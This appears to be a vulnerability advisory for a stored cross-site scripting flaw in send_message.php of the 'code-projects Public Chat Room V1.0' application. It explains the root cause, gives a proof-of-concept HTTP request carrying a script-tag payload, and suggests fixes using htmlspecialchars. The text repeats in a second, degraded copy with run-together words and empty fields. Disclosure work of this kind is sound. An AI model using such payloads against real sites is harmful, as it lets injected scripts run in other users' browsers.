code-projects Public Chat Room V1.0/send_message.php Stored XSS Attack
NAME OF AFFECTED PRODUCT(S)
Vendor Homepage
AFFECTED AND/OR FIXED VERSION(S)
submitter
Vulnerable File
VERSION(S)
Software Link
PROBLEM TYPE
Vulnerability Type
Root Cause
- The server fails to escape user input before rendering it to the browser, omitting the use of functions like
htmlspecialchars(). As a result, HTML/JavaScript code submitted by users is interpreted and executed by the browser.
Impact
DESCRIPTION
- This vulnerability appears in the chat message rendering logic, where user-submitted content such as
chat_msg and your_name is retrieved from the database and directly echoed into the HTML page without proper HTML encoding. An attacker can inject malicious HTML or JavaScript content, which will execute in other users' browsers when they view the page, resulting in a Cross-Site Scripting (XSS) attack.
Vulnerability details and POC
Vulnerability Name:
POC Example:
---
POST /chat/send_message.php HTTP/1.1
Host: localhost
Content-Length: 48
sec-ch-ua-platform: "Windows"
Accept-Language: zh-CN,zh;q=0.9
sec-ch-ua: "Not?A_Brand";v="99", "Chromium";v="130"
sec-ch-ua-mobile: ?0
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.70 Safari/537.36
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/chat/home.php
Accept-Encoding: gzip, deflate, br
Cookie: PHPSESSID=l5ngo5kq1gihp96qvkbbms3vi6
Connection: keep-alive
msg=%3Cscript%3Ealert('XSS')%3C%2Fscript%3E&id=1
---The following is the vulnerability exploitation process and the screenshot of the result:
<script>alert('XSS')</script>
Suggested repair
- Escape all user-generated output using HTML entities:
Use htmlspecialchars($msg, ENT_QUOTES, 'UTF-8') to prevent HTML/JS execution.
- Input Sanitization:
Apply input filters or allowlists to prevent users from submitting HTML/JS code.
code-projects Public Chat Room V1.0/send_message.php Stored XSS Attack
NAME OF AFFECTED PRODUCT(S)
Vendor Homepage
AFFECTED AND/OR FIXED VERSION(S)
submitter
Vulnerable File
VERSION(S)
Software Link
PROBLEM TYPE
Vulnerability Type
Root Cause
htmlspecialchars(). As a result, HTML/JavaScript code submitted by users is interpreted and executed by the browser.Impact
An attacker can execute arbitrary scripts, leading to:
DESCRIPTION
chat_msgandyour_nameis retrieved from the database and directly echoed into the HTML page without proper HTML encoding. An attacker can inject malicious HTML or JavaScript content, which will execute in other users' browsers when they view the page, resulting in a Cross-Site Scripting (XSS) attack.Vulnerability details and POC
Vulnerability Name:
POC Example:
The following is the vulnerability exploitation process and the screenshot of the result:
Suggested repair
Use
htmlspecialchars($msg, ENT_QUOTES, 'UTF-8')to prevent HTML/JS execution.Apply input filters or allowlists to prevent users from submitting HTML/JS code.